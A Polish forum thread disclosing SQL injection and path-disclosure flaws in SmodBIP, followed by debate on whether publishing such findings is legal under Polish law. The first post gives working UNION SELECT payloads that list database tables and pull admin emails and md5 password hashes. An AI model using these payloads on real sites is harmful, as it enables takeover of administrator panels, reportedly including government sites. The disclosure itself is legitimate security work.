[bugtraq] SmodBIP v.1.11 - Multiple Remote Vulnerabilities

[AdrianPietka]

Na atak poddatna jest najnowsza wersja SmodBIP jak i również wersja 1.10. Nie wiem jak sprawa ma się z niższymi.

SQL INJECTION

Kod:

index.php?id=11&roks=[sql injection]

index.php?id=11&zoom=[sql injection]

FULL PATH DISCLOSURE

Kod:

php/auctionlook.php
php/foot.php
php/menu.php
php/redakcja.php
php/sitemap.php
php/stat.php
php/top.php
php/top_menu.php
php/winieta.php

edytor/php/foot.php
edytor/php/ses.php
edytor/php/top.php

Przykladowe wykorzystanie:

Kod:

index.php?id=11&zoom=0 union select 1,2,3,4,5,6,7,8,9,0,0 /*

index.php?id=11&roks=0 union select 1,2,3,4,5,6,7,8,9,0,0 /*

Kod:

index.php?id=11&zoom=0 union select 1,2,3,table_name,5,6,7,8,9,0,0 from INFORMATION_SCHEMA.TABLES /*

^^ W ten sposob mozemy dowiedziec sie jakie tabele znajduja w bazie danych.

Kod:

index.php?id=11&zoom=0 or 1=1 union select 1,Email,3,haslo,5,6,7,8,9,0,0 from bip_SmodBIP_admin /*

^ Przykladowe zapytanie wyciagajace z tabeli "bip_SmodBIP_admin" adres e-mail (ktory jest potrzebny do zalogowania sie do panelu administracyjnego) oraz hasło zhaszowane w md5.

Zagrozenie?
Bardzo duże. W kilka chwil wprawiony atakujacy może uzyskac dostep do panelu administracyjnego.

Warto dodać ze skrypt obsluguje kilkanaście BIPów, w domenach rządowych.
Autor został skryptu powiadomiony.

Btw, czy w świetle prawa, publikując coś takiego łamię prawo?


Serdecznie pozdrawiam,
Adrian Piętka

[GSG-9]

no i co w zwiazku z tym?
nie rozumiem 'przeslania' powyzszej wiadomosci

[AdrianPietka]

no i co w zwiazku z tym?
nie rozumiem 'przeslania' powyzszej wiadomosci

Anglojęzyczni użytkownicy maja milw0rm, SecurityFocus na których publikują takie bądź podobne informacje. Niestety w Polsce nie mamy żadnej listy bugtraq (nawet ta z cc-teamu umarła jakiś czas temu). Dlatego też informacja powędrowała na forum.

huhuhu, ciekawe, ciekawe. sam to ogarnales czy masz info od kogos/skads? najzabawniejsze jest to ze i tak nie umialbym z tego skorzystac .

Sam, przeglądając funkcjonalność oraz kod skryptu.

Niestety tak...
Nie pamietam konkretnych artykulow kodeksu karnego, ale to na pewno mozna podpiac pod pomocnictwo w popelnieniu przestepstwa.
Wieczorem jeszcze przejrze kodeks i postaram sie napisac cos wiecej bo teraz czas mnie goni.

Rozumię... Jeśli uda znaleźć Ci się jakieś konkretne informacje w wolnym czasie, to byłbym Ci za nie bardzo wdzięczny

jeśli już ktokolwiek powinien być pociągnięty do odpowiedzialności to na pewno nie ten kto odkrył bug.
congrat. Adrian.

Również tak myślę, ale nigdy nic nie wiadomo. Chcę być tego w 100% pewny


Pozdrawiam,
Adrian Piętka

[h3x]

takie 'skrypty' powstaja chyba celowo...

[TQM]

Celowo tzn "broken by design" :-)

Wiecie, ze brak sprawdzania danych wejsciowych (niewlasciwa ich obsluga a w sumie to brak jakiejkolwiek obslugi) to najczestszy powod wszelkich podmian stron w 2007 roku?

[studencik20]

Dobra, nawiazujac jeszcze do tego aspektu prawnego odszukalem co nastepuje:

Art. 269b. (99) § 1. Kto wytwarza, pozyskuje, zbywa lub udostępnia innym osobom urządzenia lub programy komputerowe przystosowane do popełnienia przestępstwa określonego w art. 165 § 1 pkt 4, art. 267 § 2, art. 268a § 1 albo § 2 w związku z § 1, art. 269 § 2 albo art. 269a, a także hasła komputerowe, kody dostępu lub inne dane umożliwiające dostęp do informacji przechowywanych w systemie komputerowym lub sieci teleinformatycznej,
podlega karze pozbawienia wolności do lat 3.

No coz, tylko 3 latka groza
Wszystko jednak zalezy od interpretacji takiego przepisu przez sedziego.
Ignorantia iuris nocet czyli nieznajomosc prawa szkodzi, wiec jesli np. staralbys sie
bronic mowiac, ze nie wiedziales, ze to co robisz jest przestepstwem, to niestety
nikt nie wezmie tego pod uwage (moze ewentualnie wymierzy nizszy wymiar kary)

Jesli chodzi o pomocnictwo to sie pomylilem bo tam musialby byc Twoj zamiar aby ktos inny dokonal czynu zabronionego (a sadze, ze takiego zamiaru nie masz...)

Zgadzam sie rowniez z tym co markossx powiedzial, jednak prawo w Polsce jest takie a nie inne

[Guzik1252]

Anglojęzyczni użytkownicy maja milw0rm, SecurityFocus na których publikują takie bądź podobne informacje. Niestety w Polsce nie mamy żadnej listy bugtraq (nawet ta z cc-teamu umarła jakiś czas temu). Dlatego też informacja powędrowała na forum.

Mamy i to bardzo dobry =D devilteam.pl
codziennie dodaja nowe luki sql, xss i lfi =D
A co do twojego bugtraq to niezly jesli go sam znalazles =D i mysle ze dobrym pomyslem byloby otworzenie na tym forum takiego dzialu jak bugtraq =D to tylko takie moje skromne zdanie

[GSG-9]

Dt?łee Wstydziłbym się tam pokazać :F

[TQM]

Guzik1252 - jesli bedzie mial kto w tym dziale pisac to pomysl jak najbardziej rozsadny tylko ile osob bedzie pisac albo chocby omawiac CVE?

[mtbs]

huhuhu, ciekawe, ciekawe. sam to ogarnales czy masz info od kogos/skads? najzabawniejsze jest to ze i tak nie umialbym z tego skorzystac .

ps. z tego co mi sie zdaje(ale moge sie mylic) w pl samo publikowanie takich informacji nie jest nielegalne, tymbardziej ze admin jest juz powiadomiony. ale jesli w tekscie naklaniasz do wlamu albo to sugerujesz moga cie pociagnac za namowe do przestepstwa a za to chyba mozna nawet do ok. 3-4 lat wyhaczyc